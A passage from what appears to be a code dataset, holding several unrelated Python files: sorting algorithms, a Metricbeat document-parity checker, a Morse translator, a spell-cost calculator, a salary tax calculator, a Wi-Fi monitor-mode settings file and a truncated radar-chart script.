current element to the one to the right, if larger than we swap places(indices)\n            if arr[x] > arr[x + 1]:\n                arr[x], arr[x + 1] = arr[x + 1], arr[x]\n\n    return arr\n\n\n# STRETCH: implement the Count Sort function below\n'''\n\nCounting sort is a sorting algorithm that sorts the elements of an array by counting the number of occurrences of each unique element in the array. 
The count is stored in an auxiliary array and the sorting is done by mapping the count as an index of the auxiliary array.\n\n'''\n\n# Looking in the test_iterative.py, in arr4, the range is set to 200 so I will set the max to 200\n\ndef count_sort( arr, maximum=200 ):\n    # iterate over array values\n    for i in arr:\n        # checking to see if there is a negative element in the array; if so, return the statement in the test file\n        if i < 0:\n            return \"Error, negative numbers not allowed in Count Sort\"\n    # setting everything to zero\n    count = [0] * (maximum + 1)\n    arr_set = [0] * len(arr)\n\n    for i in arr:\n        count[i] +=1\n\n    for i in range(1, len(count)):\n        count[i] += count[i - 1]\n    \n    for i in range(len(arr) - 1, -1, -1):\n        arr_set[count[arr[i]] - 1] = arr[i]\n        count[arr[i]] -= 1\n\n    return arr_set","sub_path":"src/iterative_sorting/iterative_sorting.py","file_name":"iterative_sorting.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"337511209","text":"import os\nimport sys\nimport json\nimport pprint\nfrom dictdiffer import diff\n\nallowed_insertions_in_metricbeat_docs = [\n    # 'path.to.field'\n    'service',\n    '@timestamp',\n    'agent',\n    'event',\n    'host',\n    'ecs',\n    'metricset'\n]\n\nallowed_deletions_from_metricbeat_docs = [\n    # 'path.to.field'\n    'source_node',\n]\n\ndef log_ok(message):\n    sys.stdout.write(\"OK: \" + message + \"\\n\")\n\ndef log_error(message):\n    sys.stderr.write(\"ERROR: \" + message + \"\\n\")\n\ndef log_parity_error(message):\n    log_error(message)\n    \ndef check_usage():\n    if (len(sys.argv) < 3):\n        log_error(\"Usage: python docs_compare.py /path/to/legacy/docs /path/to/metricbeat/docs\\n\")\n        sys.exit(1)\n\ndef get_legacy_docs_path():\n    legacy_docs_path = sys.argv[1]\n    if not os.path.exists(legacy_docs_path):\n        log_error(\"Legacy-indexed documents path does not exist: \" + legacy_docs_path + \"\\n\")\n        sys.exit(11)\n    return legacy_docs_path\n\ndef get_metricbeat_docs_path():\n    metricbeat_docs_path = sys.argv[2]\n    if not os.path.exists(metricbeat_docs_path):\n        log_error(\"Metricbeat-indexed documents path does not exist: \" + metricbeat_docs_path + \"\\n\")\n        sys.exit(12)\n    return metricbeat_docs_path\n\ndef get_doc_types(docs_path):\n    files = os.listdir(docs_path)\n    doc_types = []\n    for doc_type_filename in (f for f in files if os.path.isfile(os.path.join(docs_path, f))):\n        name, _ext = doc_type_filename.split('.')\n        doc_types.append(name)\n    return doc_types\n\ndef check_num_doc_types(legacy_doc_types, metricbeat_doc_types):\n    if len(legacy_doc_types) > len(metricbeat_doc_types):\n        diff_elements = set(legacy_doc_types) - set(metricbeat_doc_types)\n        log_parity_error(\"Found more legacy-indexed document types than metricbeat-indexed document types.\\n \\\n            Document types indexed by legacy collection but not by Metricbeat collection: {}\".format(pprint.pformat(diff_elements)))\n\ndef get_doc(docs_path, doc_type):\n    with open(os.path.join(docs_path, doc_type + \".json\")) as f:\n        data = f.read()\n    return json.loads(data)\n\ndef remove_field(doc, field):\n    field_path_segments = field.split(\".\")\n    last_segment = field_path_segments.pop()\n\n    d = doc\n    for segment in field_path_segments:\n        if segment in d:\n            d = d[segment]\n\n    d.pop(last_segment, None)\n\ndef remove_optional_fields(doc, fields):\n    for field in fields:\n        remove_field(doc, field)\n\ndef has_insertions_recursive(obj):\n    obj_type = type(obj)\n\n    if obj_type is dict:\n        keys = obj.keys()\n        if '$insert' in keys:\n            return 
True\n\n for key in keys:\n if has_insertions_recursive(obj[key]):\n return True\n elif obj_type is list:\n for el in obj:\n if has_insertions_recursive(el):\n return True\n else:\n return False\n\ndef has_deletions_recursive(obj):\n obj_type = type(obj)\n\n if obj_type is dict:\n keys = obj.keys()\n if '$delete' in keys:\n return True\n\n for key in keys:\n if has_deletions_recursive(obj[key]):\n return True\n elif obj_type is list:\n for el in obj:\n if has_deletions_recursive(el):\n return True\n else:\n return False\n\ndef make_diff_path(diff_path):\n if isinstance(diff_path, list):\n path = ''\n for item in diff_path:\n path = path + '.' + str(item)\n return path.strip('.')\n else:\n return diff_path\n\ndef check_diff(diff_item, allowed_diffs_in_metricbeat_docs):\n unexpected_diff_paths = []\n\n diff_parent_path = make_diff_path(diff_item[1])\n diff_children = diff_item[2]\n\n for diff_child in diff_children:\n diff_path = diff_parent_path + '.' + str(diff_child[0])\n diff_path = diff_path.strip('.')\n\n if diff_path not in allowed_diffs_in_metricbeat_docs:\n unexpected_diff_paths.append(diff_path)\n\n return unexpected_diff_paths\n\ndef check_parity(handle_special_cases = lambda t, i, m: None, allowed_insertions_in_metricbeat_docs_extra = [], allowed_deletions_from_metricbeat_docs_extra = []):\n allowed_insertions_in_metricbeat_docs.extend(allowed_insertions_in_metricbeat_docs_extra)\n allowed_deletions_from_metricbeat_docs.extend(allowed_deletions_from_metricbeat_docs_extra)\n\n check_usage()\n\n legacy_docs_path = get_legacy_docs_path()\n metricbeat_docs_path = get_metricbeat_docs_path()\n\n legacy_doc_types = get_doc_types(legacy_docs_path)\n metricbeat_doc_types = get_doc_types(metricbeat_docs_path)\n\n check_num_doc_types(legacy_doc_types, metricbeat_doc_types)\n\n num_errors = 0\n for doc_type in legacy_doc_types:\n legacy_doc = get_doc(legacy_docs_path, doc_type)\n metricbeat_doc = get_doc(metricbeat_docs_path, doc_type)\n\n handle_special_cases(doc_type, legacy_doc, metricbeat_doc)\n\n unexpected_insertions = []\n unexpected_deletions = []\n for diff_item in diff(legacy_doc, metricbeat_doc):\n diff_type = diff_item[0]\n\n if diff_type == 'add':\n unexpected_insertions.extend(check_diff(diff_item, allowed_insertions_in_metricbeat_docs))\n\n if diff_type == 'remove':\n unexpected_deletions.extend(check_diff(diff_item, allowed_deletions_from_metricbeat_docs))\n\n if len(unexpected_insertions) == 0 and len(unexpected_deletions) == 0:\n log_ok(\"Metricbeat-indexed doc for type='\" + doc_type + \"' has expected parity with legacy-indexed doc.\")\n continue\n\n if len(unexpected_insertions) > 0:\n for insertion in unexpected_insertions:\n log_parity_error(\"Metricbeat-indexed doc for type='\" + doc_type + \"' has unexpected insertion: \" + insertion)\n num_errors = num_errors + 1\n\n if len(unexpected_deletions) > 0:\n for deletion in unexpected_deletions:\n log_parity_error(\"Metricbeat-indexed doc for type='\" + doc_type + \"' has unexpected deletion: \" + deletion)\n num_errors = num_errors + 1\n\n print(\"*** Legacy-indexed doc for type='\" + doc_type + \"': ***\")\n print(legacy_doc)\n\n print(\"*** Metricbeat-indexed doc for type='\" + doc_type + \"': ***\")\n print(metricbeat_doc)\n\n if num_errors > 0:\n exit(100 + num_errors)\n","sub_path":"playbooks/monitoring/common/docs_compare_util.py","file_name":"docs_compare_util.py","file_ext":"py","file_size_in_byte":6143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
+{"seq_id":"225392931","text":"import simple_draw as sd\n\n\nclouds_list_coord = [(0, 570, 50),\n (80, 570, 70),\n (150, 570, 40),\n (200, 570, 50),\n (270, 570, 40),\n ]\n\n\ndef draw_clouds():\n for coord in clouds_list_coord:\n sd.circle(center_position=sd.get_point(coord[0], coord[1]), radius=coord[2],\n width=0, color=sd.COLOR_WHITE)\n","sub_path":"lesson_005/draw_object/clouds.py","file_name":"clouds.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"48809843","text":"interface = 'wlo1'\nmonitor_enable = 'sudo service network-manager stop;sudo ifconfig wlo1 down;sudo iwconfig wlo1 mode monitor;sudo ifconfig wlo1 up'\nmonitor_disable = 'sudo ifconfig wlo1 down;sudo iwconfig wlo1 mode Managed;sudo ifconfig wlo1 up;sudo service network-manager start'\nchange_channel = 'iw dev wlo1 set channel %s'\nchannels = [6]\nsub_type_filter=[\"beacon\",\"probe-response\",\"qos-data\"]\nrssi_level_filter = -900\nlearning = False\nlearning_interval = 3\nexport_interval = 1\ngenerate_graph=True","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"93732198","text":"\"\"\"Překladač.\"\"\"\n# Mapování písmen abecedy na znaky Morseovy abecedy\nalphabetMorse = {\n \"a\": \".-\",\n \"b\": \"-...\",\n \"c\": \"-.-.\",\n \"d\": \"-..\",\n \"e\": \".\",\n \"f\": \"..-.\",\n \"g\": \"--.\",\n \"h\": \"....\",\n \"ch\": \"----\",\n \"i\": \"..\",\n \"j\": \".---\",\n \"k\": \"-.-\",\n \"l\": \".-..\",\n \"m\": \"--\",\n \"n\": \"-.\",\n \"o\": \"---\",\n \"p\": \".--.\",\n \"q\": \"--.-\",\n \"r\": \".-.\",\n \"s\": \"...\",\n \"t\": \"-\",\n \"u\": \"..-\",\n \"v\": \"...-\",\n \"w\": \".--\",\n \"x\": \"-..-\",\n \"y\": \"-.--\",\n \"z\": \"--..\"\n}\n\n# Mapování znaků Morseovy abecedy na písmena abecedy\nmorseAlphabet = {\n \".-\": \"a\",\n \"-...\": \"b\",\n \"-.-.\": \"c\",\n \"-..\": \"d\",\n \".\": \"e\",\n \"..-.\": \"f\",\n \"--.\": \"g\",\n \"....\": \"h\",\n \"----\": \"ch\",\n \"..\": \"i\",\n \".---\": \"j\",\n \"-.-\": \"k\",\n \".-..\": \"l\",\n \"--\": \"m\",\n \"-.\": \"n\",\n \"---\": \"o\",\n \".--.\": \"p\",\n \"--.-\": \"q\",\n \".-.\": \"r\",\n \"...\": \"s\",\n \"-\": \"t\",\n \"..-\": \"u\",\n \"...-\": \"v\",\n \".--\": \"w\",\n \"-..-\": \"x\",\n \"-.--\": \"y\",\n \"--..\": \"z\"\n}\n\n# Mezera\nspace = \" \"\n# Oddělovač znaků Morseovy abecedy\ncharSeparator = \"|\"\n\n\ndef isAlphabetTranslation():\n \"\"\"Funkce, která zajišťuje správný výběr překladu.\"\"\"\n print(\"Translate from:\")\n print(\"1 - Alphabet\")\n print(\"2 - Morse code\")\n while True:\n # Kontrola, jestli je uživatelský vstup číslo\n try:\n index = int(input(\"Enter the translation number: \"))\n except ValueError:\n print(\"Not an integer!\")\n continue\n if (index == 1):\n return True\n elif (index == 2):\n return False\n else:\n continue\n\n\ndef alphabetTranslation(text):\n \"\"\"Funkce překládá z abecedy do Morseovy abecedy.\"\"\"\n result = \"\"\n for char in text.lower():\n if char in alphabetMorse:\n result += alphabetMorse[char]\n elif char == space:\n result += space\n return result\n\n\ndef morseCodeTranslation(text):\n \"\"\"Funkce překládá z Morseovy abecedy do abecedy.\"\"\"\n result = \"\"\n chars = text.split(charSeparator)\n for char in chars:\n if char in morseAlphabet:\n result += morseAlphabet[char]\n elif char == space:\n result += space\n return 
result\n\n\ndef translation(text, isAlphabet):\n    \"\"\"Translates text from the alphabet to Morse code and vice versa.\"\"\"\n    if text is None:\n        return \"\"\n\n    # Strip the quotes at the beginning and end\n    modifyText = text[1:-1].strip()\n    # Check for an empty string\n    if modifyText == \"\":\n        return \"\"\n    return (morseCodeTranslation(modifyText) if not isAlphabet else\n            alphabetTranslation(modifyText))\n\n\ndef mainLoop(isRepeat):\n    \"\"\"Logic of the program's main loop.\"\"\"\n    # Menu (basic setup for encoding and decoding)\n    (print(\"Welcome to the Translator!\\n\") if not isRepeat else\n     print(\"Translator\\n\"))\n    isAlphabet = isAlphabetTranslation()\n    print()\n\n    if not isAlphabet:\n        print(\"Character separator \\\"|\\\".\")\n    text = input(\"Enter text between \\\"\\\": \")\n    print()\n\n    print(\"Translation:\")\n    print(translation(text, isAlphabet))\n\n\ndef run():\n    \"\"\"Main loop of the program.\"\"\"\n    isRepeat = False\n    exitCode = 'n'\n\n    # Start the main loop\n    while exitCode != 'y':\n        mainLoop(isRepeat)\n        exitCode = input(\"\\nDo you want to exit the program (y/n): \").lower()\n        print()\n        isRepeat = True\n\n\nif __name__ == '__main__':\n    run()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"453159195","text":"from model.contact import Contact\nimport random\n\n\n\ndef test_delete_some_contact(app, db, check_ui):\n    if len(db.get_contact_list()) == 0:\n        app.contact.create(Contact(firstname=\"fjfjfj\", middlename=\"отчество\", lastname=\"фамилия\", nickname=\"вввв\", title=\"пользователь\"))\n    old_contacts = db.get_contact_list()\n    contact = random.choice(old_contacts)\n    app.contact.delete_contact_by_id(contact.id)\n    assert len(old_contacts) - 1 == app.contact.count()\n    new_contacts = db.get_contact_list()\n    old_contacts.remove(contact)\n    assert old_contacts == new_contacts\n    if check_ui:\n        assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)\n\n#def test_delete_first_contact(app):\n   # if app.contact.count() == 0:\n       # app.contact.create(Contact(firstname=\"fjfjfj\", middlename=\"отчество\", lastname=\"фамилия\", nickname=\"вввв\", title=\"пользователь\"))\n    #old_contacts = app.contact.get_contact_list()\n    #app.contact.delete_first_contact()\n    #assert len(old_contacts) - 1 == app.contact.count()\n    #new_contacts = app.contact.get_contact_list()\n    #old_contacts[0:1] = []\n    #assert old_contacts == new_contacts\n\n\n\n\n\n\n","sub_path":"test/contact_tests/test_delete_contact.py","file_name":"test_delete_contact.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"31526449","text":"import math\r\n\r\nimport params\r\nimport pandas\r\n\r\nCOST_CSV = 'costs.csv'\r\nDUR_LOG_BASE = 1.2\r\n\r\n\r\ndef get_level(cost):\r\n    idx = 0\r\n    for boundary in params.LEVEL_BOUNDARIES:\r\n        idx += 1\r\n        if cost < boundary:\r\n            break\r\n    return idx\r\n\r\n\r\ndef get_intensity_desc(effect, intensity):\r\n    if intensity >= len(params.INTENSITY_DESC[effect]):\r\n        idx = -1\r\n    else:\r\n        idx = intensity\r\n\r\n    return params.INTENSITY_DESC[effect][idx]\r\n\r\n\r\ndef is_compatible(form, effect):\r\n    if effect == 'None':\r\n        return True\r\n    df_temp = pandas.read_csv(COST_CSV)\r\n    df_cost = df_temp[df_temp[\"Rune\"] == form]\r\n\r\n    return df_cost[effect].values[0] != 0\r\n\r\n\r\ndef 
get_duration_string(index, dur, dvar):\r\n if dur == 'None':\r\n return \"\"\r\n durstring = f\"Duration{index}: \"\r\n if dur in params.DURATION_DICT.keys():\r\n durstring += f\"{dvar} {params.DURATION_DICT[dur]}\\n\"\r\n else:\r\n durstring += f\"{dur}\\n\"\r\n return durstring\r\n\r\n\r\nclass Spell:\r\n def __init__(self, name, *args):\r\n self.name = name\r\n # print(args)\r\n self.form = args[0]\r\n self.effect = args[1]\r\n if args[2] == 'None':\r\n self.intensity = 0\r\n else:\r\n self.intensity = int(args[2])\r\n self.effect2 = args[3]\r\n if args[4] == 'None':\r\n self.intensity2 = 0\r\n else:\r\n self.intensity2 = int(args[4])\r\n self.target = args[5]\r\n self.target2 = args[6]\r\n self.attachment = args[7]\r\n self.attachment2 = args[8]\r\n self.spell_range = args[9]\r\n self.spell_range2 = args[10]\r\n self.area = args[11]\r\n self.area2 = args[12]\r\n self.delivery = args[13]\r\n self.duration = args[14]\r\n if args[15] == 'None':\r\n self.duration_var = 0\r\n else:\r\n self.duration_var = int(args[15])\r\n self.duration2 = args[16]\r\n if args[17] == 'None':\r\n self.duration_var2 = 0\r\n else:\r\n self.duration_var2 = int(args[17])\r\n self.complexity = args[18]\r\n df_temp = pandas.read_csv(COST_CSV)\r\n self.df_cost = df_temp[df_temp[\"Rune\"] == self.form]\r\n self.power_cost = self.calculate_power_cost()\r\n self.difficulty_cost = self.calculate_difficulty_cost()\r\n self.power_idx, self.difficulty_idx = \\\r\n self.modify_levels(get_level(self.power_cost), get_level(self.difficulty_cost))\r\n\r\n def calc_duration_power_cost(self):\r\n cost = self.get_dur_pow_subcost(self.duration, self.duration_var)\r\n if self.duration2 != 'None':\r\n cost += self.get_dur_pow_subcost(self.duration2, self.duration_var2)\r\n return cost\r\n\r\n def get_dur_pow_subcost(self, dur, dur_var):\r\n duration_base = self.df_cost[\"Duration\"].values[0]\r\n d_to_log = params.DURATION_COSTS[\"multiplier\"][dur] * dur_var\r\n if d_to_log == 0:\r\n duration_cost = params.DURATION_COSTS[\"no_log\"][dur]\r\n else:\r\n duration_cost = math.log(d_to_log, DUR_LOG_BASE) + 1\r\n duration_cost *= duration_base\r\n return duration_cost\r\n\r\n def calc_duration_difficulty_cost(self):\r\n return self.calc_duration_power_cost() / 2\r\n\r\n def calculate_power_cost(self):\r\n # get effect_intensity cost\r\n intsq = self.intensity ** 2\r\n ei_base = self.df_cost[self.effect].values[0]\r\n ei_cost = intsq * ei_base\r\n if self.effect2 != 'None':\r\n intsq2 = self.intensity2 ** 2\r\n ei_base2 = self.df_cost[self.effect2].values[0]\r\n ei_cost2 = intsq2 * ei_base2\r\n ei_cost = max(ei_cost, ei_cost2)\r\n # get target cost\r\n target_cost = params.TARGET_COSTS[\"power\"][self.target]\r\n if self.target2 != 'None':\r\n target_cost += params.TARGET_COSTS[\"power\"][self.target2]\r\n # get attachment cost\r\n att_cost = params.ATTACHMENT_COSTS[\"power\"][self.attachment]\r\n if self.attachment2 != 'None':\r\n att_cost += params.ATTACHMENT_COSTS[\"power\"][self.attachment2]\r\n # get range cost\r\n range_base = self.df_cost[\"Range\"].values[0]\r\n range_idx = params.RANGES.index(self.spell_range)\r\n range_cost = range_base * range_idx\r\n if self.spell_range2 != 'None':\r\n print(\"********************\")\r\n print(self.spell_range2)\r\n print(\"********************\")\r\n range_cost += range_base * params.RANGES.index(self.spell_range2)\r\n # get area cost\r\n area_base = self.df_cost[\"Area\"].values[0]\r\n area_idx = params.AREAS.index(self.area)\r\n area_cost = area_base * area_idx ** 4\r\n if self.area2 != 
'None':\r\n area_cost += area_base * params.AREAS.index(self.area2) ** 4\r\n # get delivery cost\r\n delivery_cost = params.DELIVERY_COSTS[\"power\"][self.delivery]\r\n # get duration cost\r\n duration_cost = self.calc_duration_power_cost()\r\n print(\"POWER COSTS\")\r\n print(f\"ei_cost: {ei_cost}\")\r\n print(f\"target cost: {target_cost}\")\r\n print(f\"attachment cost: {att_cost}\")\r\n print(f\"range cost: {range_cost}\")\r\n print(f\"area cost: {area_cost}\")\r\n print(f\"delivery cost: {delivery_cost}\")\r\n print(f\"duration cost: {duration_cost}\")\r\n print(\"=============================\")\r\n\r\n total = ei_cost + target_cost + att_cost + range_cost + area_cost + delivery_cost + duration_cost\r\n return total\r\n\r\n def calculate_difficulty_cost(self):\r\n # get effect_intensity cost\r\n ei_base = self.df_cost[self.effect].values[0]\r\n ei_cost = self.intensity * ei_base * 2\r\n if self.effect2 != 'None':\r\n ei_base2 = self.df_cost[self.effect2].values[0]\r\n ei_cost2 = self.intensity2 * ei_base2 * 2\r\n ei_cost = ei_cost + ei_cost2\r\n # get target cost\r\n target_cost = params.TARGET_COSTS[\"difficulty\"][self.target]\r\n if self.target2 != 'None':\r\n target_cost += params.TARGET_COSTS[\"difficulty\"][self.target2]\r\n # get attachment cost\r\n att_cost = params.ATTACHMENT_COSTS[\"difficulty\"][self.attachment]\r\n if self.attachment2 != 'None':\r\n att_cost += params.ATTACHMENT_COSTS[\"difficulty\"][self.attachment2]\r\n # get range cost\r\n range_base = self.df_cost[\"Range\"].values[0]\r\n range_idx = params.RANGES.index(self.spell_range)\r\n range_cost = range_base * int(math.sqrt(range_idx))\r\n if self.spell_range2 != 'None':\r\n range_cost += self.df_cost[\"Range\"].values[0] * int(math.sqrt(params.RANGES.index(self.spell_range2)))\r\n # get area cost\r\n area_base = self.df_cost[\"Area\"].values[0]\r\n area_idx = params.AREAS.index(self.area)\r\n area_cost = area_base * area_idx ** 4\r\n if self.area2 != 'None':\r\n area_cost += self.df_cost[\"Area\"].values[0] * params.AREAS.index(self.area2) ** 2\r\n # get delivery cost\r\n delivery_cost = params.DELIVERY_COSTS[\"difficulty\"][self.delivery]\r\n # get duration cost\r\n duration_cost = self.calc_duration_difficulty_cost()\r\n print(\"DIFFICULTY COSTS\")\r\n print(f\"ei_cost: {ei_cost}\")\r\n print(f\"target cost: {target_cost}\")\r\n print(f\"attachment cost: {att_cost}\")\r\n print(f\"range cost: {range_cost}\")\r\n print(f\"area cost: {area_cost}\")\r\n print(f\"delivery cost: {delivery_cost}\")\r\n print(f\"duration cost: {duration_cost}\")\r\n print(\"==============================\")\r\n\r\n total = ei_cost + target_cost + att_cost + range_cost + area_cost + delivery_cost + duration_cost\r\n return total\r\n\r\n def modify_levels(self, power_level, difficulty_level):\r\n power_level += params.COMPLEXITY_MOD[self.complexity][0]\r\n difficulty_level += params.COMPLEXITY_MOD[self.complexity][1]\r\n return int(power_level), int(difficulty_level)\r\n\r\n def dump_spell(self):\r\n return self.name + \"\\n---------------\\n\" + self.dump_spell_without_name()\r\n\r\n def dump_spell_without_name(self):\r\n # spell_text = self.name + \"\\n---------------\\n\"\r\n spell_text = f\"Form: {self.form}\\n\"\r\n spell_text += f\"Effect: {self.effect}\\n\"\r\n spell_text += f\"Intensity: {self.intensity} --> {get_intensity_desc(self.effect, self.intensity)}\\n\"\r\n if self.effect2 != 'None':\r\n spell_text += f\"Effect2: {self.effect2}\\n\"\r\n spell_text += f\"Intensity2: {self.intensity2} - 
{get_intensity_desc(self.effect2, self.intensity2)}\\n\"\r\n        spell_text += f\"Target: {self.target}\\n\"\r\n        if self.target2 != 'None':\r\n            spell_text += f\"Target2: {self.target2}\\n\"\r\n        spell_text += f\"Attachment: {self.attachment}\\n\"\r\n        if self.attachment2 != 'Normal':\r\n            spell_text += f\"Attachment2: {self.attachment2}\\n\"\r\n        spell_text += f\"Spell range: {self.spell_range}\\n\"\r\n        if self.spell_range2 != 'None':\r\n            spell_text += f\"Spell range2: {self.spell_range2}\\n\"\r\n        spell_text += f\"Area: {self.area}\\n\"\r\n        if self.area2 != 'None':\r\n            spell_text += f\"Area2: {self.area2}\\n\"\r\n        spell_text += f\"Delivery: {self.delivery}\\n\"\r\n        spell_text += get_duration_string(\"\", self.duration, self.duration_var)\r\n        spell_text += get_duration_string(\"2\", self.duration2, self.duration_var2)\r\n        spell_text += f\"Complexity: {self.complexity}\\n\"\r\n        spell_text += f\"Power cost: {self.power_cost:.2f}\\n\"\r\n        spell_text += f\"Difficulty cost: {self.difficulty_cost:.2f}\\n\"\r\n        spell_text += \"================================\\n\"\r\n        spell_text += f\"Power level: {params.LEVELS[self.power_idx]}\\n\"\r\n        spell_text += f\"Difficulty level: {params.LEVELS[self.difficulty_idx]}\\n\"\r\n\r\n        return spell_text\r\n","sub_path":"spell.py","file_name":"spell.py","file_ext":"py","file_size_in_byte":9862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
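A worked instance of get_dur_pow_subcost from spell.py above, with made-up inputs (a duration base of 2.0 and a multiplier-times-variable product of 10 — both hypothetical, since the real values come from costs.csv and params.py):

import math
duration_base = 2.0   # hypothetical df_cost["Duration"] value
d_to_log = 10         # hypothetical multiplier * dur_var
duration_cost = (math.log(d_to_log, 1.2) + 1) * duration_base  # DUR_LOG_BASE = 1.2
print(round(duration_cost, 2))  # 27.26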
+{"seq_id":"539579880","text":"import sys\nimport os\nfrom multiprocessing import Process, Queue\n# Handle command-line arguments\nclass Args():\n    def __init__(self,str):\n        self.args = sys.argv[1:]\n        self.str = str\n# Return the path that follows the given flag\n    def deal_args(self):\n        file = ''\n        try:\n            index_c = self.args.index(self.str)\n            file = self.args[index_c+1]\n        except Exception as e:\n            print(e)\n            exit()\n        return file\n# Process the data\n# JiShuL = 2193.00\nclass Config_data():\n    def __init__(self,path):\n        self.path = path\n# Parse the data and store it in a dictionary\n    def save_data(self):\n        config_dict = {}\n        try:\n            with open(self.path,'r') as f:\n                for line in f.readlines():\n                    line = line.strip('\\n')\n                    key,value = line.split('=')\n                    key = key.strip(' ')\n                    value = value.strip(' ')\n                    config_dict[key] = value\n            return config_dict\n        except Exception as e:\n            print(e)\n            exit()\n# Inherits from Config_data()\n# 101,3500\nclass User_data(Config_data):\n    def save_data(self):\n        data_dict = {}\n        try:\n            with open(self.path,'r') as f:\n                for line in f.readlines():\n                    line = line.strip('\\n')\n                    key,value = line.split(',')\n                    data_dict[key] = value\n            return data_dict\n        except Exception as e:\n            print(e)\n            exit()\n# Compute\nclass Compute():\n    def __init__(self,config_dict,money):\n        self.config_dict = config_dict\n        self.money = money\n\n    def _read_config(self,key):\n        return self.config_dict[key]\n\n    def compute_money(self):\n        insurance_money = 0\n        tax = 0\n\n        try:\n            money_l = float(self._read_config('JiShuL'))\n            money_h = float(self._read_config('JiShuH'))\n            YangLao = float(self._read_config('YangLao'))\n            YiLiao = float(self._read_config('YiLiao'))\n            ShiYe = float(self._read_config('ShiYe'))\n            GongShang = float(self._read_config('GongShang'))\n            ShengYu = float(self._read_config('ShengYu'))\n            GongJiJin = float(self._read_config('GongJiJin'))\n        except Exception as e :\n            print(e)\n            sys.exit()\n\n        if self.money <= money_l :\n            insurance_money = money_l*YangLao+money_l*YiLiao+money_l*ShiYe+money_l*GongShang+money_l*ShengYu+money_l*GongJiJin\n        elif self.money > money_l and self.money <= money_h:\n            insurance_money = self.money*YangLao+self.money*YiLiao+self.money*ShiYe+self.money*GongShang+self.money*ShengYu+self.money*GongJiJin\n        elif self.money > money_h:\n            insurance_money = money_h * YangLao + money_h * YiLiao + money_h * ShiYe + money_h * GongShang + money_h * ShengYu + money_h * GongJiJin\n\n        money_before = self.money - insurance_money-3500\n\n        if money_before <= 1500 and money_before >= 0:\n            tax = money_before * 0.03\n        elif money_before > 1500 and money_before <= 4500:\n            tax = money_before * 0.1 - 105\n        elif money_before > 4500 and money_before <= 9000:\n            tax = money_before * 0.2 - 555\n        elif money_before > 9000 and money_before <= 35000:\n            tax = money_before * 0.25 - 1005\n        elif money_before > 35000 and money_before <= 55000:\n            tax = money_before * 0.3 - 2755\n        elif money_before > 55000 and money_before <= 80000:\n            tax = money_before * 0.35 - 5505\n        elif money_before > 80000:\n            tax = money_before * 0.45 - 13505\n        if tax <= 0:\n            tax = 0\n        money = self.money - insurance_money - tax\n        return format(insurance_money,'.2f'),format(tax,'.2f'),format(money,'.2f')\n\nqueue = Queue()\n\ndef read_UsrData(q):\n    user_list = []\n    user_path = Args('-d').deal_args()\n    user_data = User_data(user_path).save_data()\n    for i in user_data:\n        tup = (i,user_data[i])\n        user_list.append(tup)\n    q.put(user_list)\n\ndef compute(q):\n    user_list = q.get()\n    money_list = []\n    config_path = Args('-c').deal_args()\n    config_data = Config_data(config_path).save_data()\n    for i in user_list:\n        insurance_money, tax, money = Compute(config_data,float(i[1])).compute_money()\n        tup = (i[0],i[1],insurance_money,tax,money)\n        money_list.append(tup)\n    #print(money_list)\n    q.put(money_list)\n\ndef write(q):\n    money_list = q.get(True, 10)\n    #print(money_list)\n    try:\n        final_path = Args('-o').deal_args()\n    except Exception as e:\n        print(e)\n        sys.exit()\n    if os.path.exists(final_path):\n        os.remove(final_path)\n    for i in money_list:\n        with open(final_path, 'a') as f:\n            f.write(i[0]+','+i[1]+','+i[2]+','+i[3]+','+i[4]+'\\n')\n\n# main function\ndef main():\n\n    Process(target=read_UsrData,args=(queue,)).start()\n    Process(target=compute,args=(queue,)).start()\n    Process(target=write,args=(queue,)).start()\n\n\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"base/cauculator_process.py","file_name":"cauculator_process.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
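The income-tax cascade in Compute.compute_money above is a textbook bracket table; the same numbers can be expressed as data, which is easier to audit than the if/elif chain — a sketch using the exact thresholds from the script:

TAX_BRACKETS = [  # (upper bound, rate, quick deduction)
    (1500, 0.03, 0), (4500, 0.10, 105), (9000, 0.20, 555),
    (35000, 0.25, 1005), (55000, 0.30, 2755), (80000, 0.35, 5505),
    (float("inf"), 0.45, 13505),
]

def tax_for(money_before):
    if money_before <= 0:
        return 0.0
    for upper, rate, deduction in TAX_BRACKETS:
        if money_before <= upper:
            return money_before * rate - deduction

print(tax_for(3000))  # 195.0, same as 3000 * 0.1 - 105 in the original chain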
+{"seq_id":"436185731","text":"# https://python-graph-gallery.com/392-use-faceting-for-radar-chart/\n#\n#\n#             per_noun   per_verb   per_adj  per_adverb\n# style                                                 \n# Brief     17.002634  15.777084  8.644375    8.481646\n# Drama     19.185251  15.481722  7.189818    5.680463\n# Epik      19.238434  16.858595  8.374700    7.617986\n# Gedicht   21.907033  12.396593  8.606924    5.365494\n# Historie  21.881628  14.877931  9.522846    6.572920\n# Nacherz   19.111306  14.417974  7.146650    6.682052\n# Philo     20.600199  15.153603  9.831002    8.378756\n#\n#\n#\n\n# Libraries\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom math import pi\n \n# Set data\ndf = pd.DataFrame({\n'Werkart': ['Gedicht', 'Philo', 'Drama', 'Epik', 'Nacherz', 'Historie', 'Brief'],\n'Substantive': [8.6, 9.8, 7.2, 8.4, 7.1, 9.5, 8.6],\n'Verben': [5.4, 8.4, 5.7, 7.6, 6.7, 6.6, 8.5],\n'Adjektive': [ 21.9, 20.6, 19.2, 19.2, 19.1, 21.9, 17],\n'Adverben': [12.4, 15.2, 15.5, 16.9, 